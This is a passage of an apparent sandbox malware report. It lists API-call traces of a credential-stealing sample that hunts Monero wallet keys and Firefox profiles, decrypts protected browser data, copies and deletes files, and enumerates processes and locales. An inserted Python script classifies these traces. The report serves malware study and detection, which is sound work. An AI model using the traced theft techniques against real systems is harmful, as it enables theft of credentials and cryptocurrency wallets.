                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: a4aa2eacbe95616077f1654266a5fbb51fb479fe52f96c1ef9e2602bfc2a89ba
                              • Instruction ID: 65c5054547cc38b3a23f184bbdef3623e51e96cc2efd95dadfd8c9fd09f26729
                              • Opcode Fuzzy Hash: a4aa2eacbe95616077f1654266a5fbb51fb479fe52f96c1ef9e2602bfc2a89ba
                              • Instruction Fuzzy Hash: 08E1C271911118AAEB68FB64DC91EEE7338FF54300F4045A9B51AE2552EE306F8ACF53
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008C15B8,008C0D96), ref: 008AF71E
                              • StrCmpCA.SHLWAPI(?,008C15BC), ref: 008AF76F
                              • StrCmpCA.SHLWAPI(?,008C15C0), ref: 008AF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008AFAB1
                              • FindClose.KERNEL32(000000FF), ref: 008AFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 8310bcf1ca3c1350c5ae10234a4becf2f5e2fa2ddf2dc7b60a80f0c47243736d
                              • Instruction ID: 8ddaca6474c577d6884cf91786a9d75c365997ef946a355da4fafd8f384d9341
                              • Opcode Fuzzy Hash: 8310bcf1ca3c1350c5ae10234a4becf2f5e2fa2ddf2dc7b60a80f0c47243736d
                              • Instruction Fuzzy Hash: 17B14371900118ABDB28FF64DC95EEE7379FF55300F4081A8A50AD6692EF306B49CB93
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008C510C,?,?,?,008C51B4,?,?,00000000,?,00000000), ref: 008A1923
                              • StrCmpCA.SHLWAPI(?,008C525C), ref: 008A1973
                              • StrCmpCA.SHLWAPI(?,008C5304), ref: 008A1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008A1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 008A1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008A1E20
                              • FindClose.KERNEL32(000000FF), ref: 008A1E32
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: e6ecd7b2711d4ddf404c4e4cfbb383ad273fa3e7b46fb637d4b76744e1da06f9
                              • Instruction ID: 1ebb2f53ac2fd84ece084e723e1441204870c6c449a884d3b09e7ca83f1d2450
                              • Opcode Fuzzy Hash: e6ecd7b2711d4ddf404c4e4cfbb383ad273fa3e7b46fb637d4b76744e1da06f9
                              • Instruction Fuzzy Hash: E812E271910118AADB29EB64CCA5EEE7378FF54300F4041A9B516E6691EF306F89CF92
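The record above (FindFirstFileA at 008A1923, two StrCmpCA calls, CopyFileA and DeleteFileA, then FindNextFileA and FindClose) is the shape of a file-grabber loop, and the same skeleton recurs in the other records in this section. The following script is an added example, not Joe Sandbox output and not code from the sample: it parses the bullets of an "APIs" list exactly as printed in this report, recovers call-site order from the ref addresses, and flags the FindFirstFileA / FindNextFileA / FindClose walk together with what the loop body does per directory entry. Reading the two StrCmpCA calls as the usual "." and ".." skip is an inference, because the report only shows the pointer operands, and the embedded sample is the API list of the record above copied from this page.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Sample input: the "APIs" list of the function at 008A1923 as printed in this
# report (the CopyFileA/DeleteFileA record above). Nothing here is a live sample.
SAMPLE_APIS = r"""
  • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008C510C,?,?,?,008C51B4,?,?,00000000,?,00000000), ref: 008A1923
• StrCmpCA.SHLWAPI(?,008C525C), ref: 008A1973
• StrCmpCA.SHLWAPI(?,008C5304), ref: 008A1989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008A1D40
• DeleteFileA.KERNEL32(00000000), ref: 008A1DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 008A1E20
• FindClose.KERNEL32(000000FF), ref: 008A1E32
  • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
"""

HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")
# One bullet of a Joe Sandbox "APIs" list: optional subcall prefix, API.MODULE,
# optional (args), then "ref: <address>". wsprintfA bullets carry no parentheses.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int                       # address of the call site
    subcall: Optional[str] = None  # set when the call sits in a called subroutine


def parse_api_list(text: str) -> list:
    """Parse the bullets of one 'APIs' list; headings and blank lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [a for a in raw.split(",") if a]
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), m.group("sub")))
    return calls


def classify(calls: list) -> dict:
    """Flag a FindFirstFileA -> (per-entry work) -> FindNextFileA -> FindClose walk
    and report what the loop body does with each directory entry."""
    direct = sorted((c for c in calls if c.subcall is None), key=lambda c: c.ref)
    ref_of = {}
    for c in direct:
        ref_of.setdefault(c.api, c.ref)  # first call site of each API
    first = ref_of.get("FindFirstFileA")
    nxt = ref_of.get("FindNextFileA")
    close = ref_of.get("FindClose")
    walk = None not in (first, nxt, close) and first < nxt < close
    body = [c.api for c in direct if walk and first < c.ref < nxt]
    # Two name comparisons inside the loop are what a "." / ".." skip looks like;
    # the report shows only the pointer operands, so this is an inference.
    skips = walk and body.count("StrCmpCA") >= 2
    # Strings the plugin resolved, as opposed to '?' or raw 8-digit hex operands
    targets = sorted({a for c in calls for a in c.args
                      if a != "?" and not HEX8.match(a)})
    return {
        "enumerates_directory": walk,
        "skips_dot_entries": skips,
        "loop_body_calls": body,
        "copies_files": "CopyFileA" in body,
        "deletes_files": "DeleteFileA" in body,
        "string_targets": targets,
    }


if __name__ == "__main__":
    for key, value in classify(parse_api_list(SAMPLE_APIS)).items():
        print(f"{key}: {value}")
```

Run it over any other "APIs" list on this page to compare records: the ones with only StrCmpCA in the loop body are pure walkers, while a CopyFileA inside the loop marks the routine that stages files, and resolved string operands such as \Monero\wallet.keys show up in string_targets.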
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,008C0C2E), ref: 008ADE5E
                              • StrCmpCA.SHLWAPI(?,008C14C8), ref: 008ADEAE
                              • StrCmpCA.SHLWAPI(?,008C14CC), ref: 008ADEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008AE3E0
                              • FindClose.KERNEL32(000000FF), ref: 008AE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 6e18b096f6a1d246760e2a5cd6affde6549abbb30db2f511b1cff009303d5c14
                              • Instruction ID: f1ccb4e7fe07b3e30e433931335f25d1e3f7ef307b6edcb8040b58080be41e2c
                              • Opcode Fuzzy Hash: 6e18b096f6a1d246760e2a5cd6affde6549abbb30db2f511b1cff009303d5c14
                              • Instruction Fuzzy Hash: 08F18271814118AADB2DEB64CCA5EEE7338FF54300F8041E9A41AE6591EF346B4ACF57
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: +_{$0_{$F/\|$P^O$T6_k$_~wX$bfO$fP=|$txw\$z\_
                              • API String ID: 0-1473951366
                              • Opcode ID: 6cee983ba22f08d9b03edef08684f358df010db00b49d8305a8dd4d71e30bf4c
                              • Instruction ID: 861e00509151ff1e5c368b98d3a93d5b5bcf091119c501335d1a781a508d47c3
                              • Opcode Fuzzy Hash: 6cee983ba22f08d9b03edef08684f358df010db00b49d8305a8dd4d71e30bf4c
                              • Instruction Fuzzy Hash: 3EB228F3A082009FE7046E2DEC8577ABBE5EF94720F1A4A3DE6C4C7744E63598058697
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008C14B0,008C0C2A), ref: 008ADAEB
                              • StrCmpCA.SHLWAPI(?,008C14B4), ref: 008ADB33
                              • StrCmpCA.SHLWAPI(?,008C14B8), ref: 008ADB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008ADDCC
                              • FindClose.KERNEL32(000000FF), ref: 008ADDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,008C05AF), ref: 008B7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 008B7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 008B7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 008B7C62
                              • LocalFree.KERNEL32(00000000), ref: 008B7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,008C0D73), ref: 008AE4A2
                              • StrCmpCA.SHLWAPI(?,008C14F8), ref: 008AE4F2
                              • StrCmpCA.SHLWAPI(?,008C14FC), ref: 008AE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008AEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: "!}$3/0A$MB;}$Me_?$NWk[$uxm]
                              • API String ID: 0-3943570821
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 61o\$Fe~$a<og$a=N$d9n
                              • API String ID: 0-3653806338
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 008AC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 008AC87C
                              • lstrcat.KERNEL32(?,008C0B46), ref: 008AC943
                              • lstrcat.KERNEL32(?,008C0B47), ref: 008AC957
                              • lstrcat.KERNEL32(?,008C0B4E), ref: 008AC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008A724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008A7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008A7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008A72A4
                              • LocalFree.KERNEL32(?), ref: 008A72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008B961E
                              • Process32First.KERNEL32(008C0ACA,00000128), ref: 008B9632
                              • Process32Next.KERNEL32(008C0ACA,00000128), ref: 008B9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 008B965C
                              • CloseHandle.KERNEL32(008C0ACA), ref: 008B967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: o9=i$r;2$V>}$zz
                              • API String ID: 0-2812664298
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 4S$R=o$no$c~I
                              • API String ID: 0-3146338768
                              • Opcode ID: 590080724121bd8d80f1b8fe9b9813cd96aa6b337059589dbc0dc00b5041ea8c
                              • Instruction ID: 02fc52a287ed166fbdf3148808254824f6b69035a2ee33c9264dc0592f5f37c6
                              • Opcode Fuzzy Hash: 590080724121bd8d80f1b8fe9b9813cd96aa6b337059589dbc0dc00b5041ea8c
                              • Instruction Fuzzy Hash: 87B216F360C2009FE3046E2DEC8567ABBE9EF94720F1A4A3DE6C4C7744EA7558058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
